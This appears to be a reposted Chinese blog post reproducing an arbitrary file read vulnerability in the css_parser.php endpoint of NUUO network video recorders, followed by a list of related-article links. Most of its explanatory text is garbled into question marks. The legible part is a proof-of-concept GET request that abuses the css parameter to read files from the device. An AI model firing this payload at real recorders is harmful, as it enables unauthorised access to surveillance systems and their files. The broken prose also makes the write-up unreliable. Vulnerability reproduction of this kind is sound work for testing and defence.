博客
关于我
NUUO网络视频录像机 css_parser.php 任意文件读取漏洞复现
阅读量:804 次
发布时间:2023-02-17

本文共 764 字,大约阅读时间需要 2 分钟。

0x01 NUUO???????????

NUUO????????Network Video Recorder???NVR??NUUO Inc.???????????????????????????????????????????????????????IP????????????????????????????????????NUUO NVR??????????????????????????

0x02 ????

???????????????????css_parser.php???????????????????????????????????????????????????????????????????????????????????

0x03 ??????

????????????????

????????URL??GET?????????

GET /css_parser.php?css=css_parser.php HTTP/1.1

??????????????????User-Agent??????

Host: www.nuuo.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:xx.xx.xx) Gecko/20100101 Firefox/xx.xx

0x04 ????

?????????PoC?Proof of Concept?????????????

GET /css_parser.php?css=css_parser.php HTTP/1.1  Host: www.nuuo.com

??????????css_parser.php???????????????????????????????????????

转载地址:http://hwnfk.baihongyu.com/

你可能感兴趣的文章
PHP应用程序连接Oracle数据库Demo(附Oracle客户端安装文件)
查看>>
PHP开发api接口安全验证
查看>>
PHP开发规范PSR
查看>>
PHP开发遇到错误0001
查看>>
rabbitmq guestguest用户不能远程登录
查看>>
php异常处理
查看>>
PHP引入了泛型和集合两大重要特性,大大改善 PHP 代码的可维护性和可读性
查看>>
PHP引擎php.ini参数优化
查看>>
PHP引用(&)使用详解
查看>>
php引用及垃圾回收
查看>>
php当前时间的集中写法
查看>>
php循环比较数组中的值,如何从PHP数组中计算值并在foreach循环中仅显示一次值?...
查看>>
php微信 开发笔记,微信WebApp开发总结笔记
查看>>
php微信公众号开发access_token获取
查看>>
php微信公众号开发微信认证开发者
查看>>
php微信公众号开发用户基本信息
查看>>
php怎么将对象变成数组,php怎么将对象转换成数组
查看>>
RabbitMQ - 消息堆积问题的最佳解决方案?惰性队列
查看>>
php怎样比较两数大小,jquery如何判断两个数值的大小
查看>>
PHP性能监控 - 开启xhprof(一)
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2026-06-17 07:16:19   当前IP: 10.8.248.218   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2025 baihongyu.com 京ICP备2021015314号-2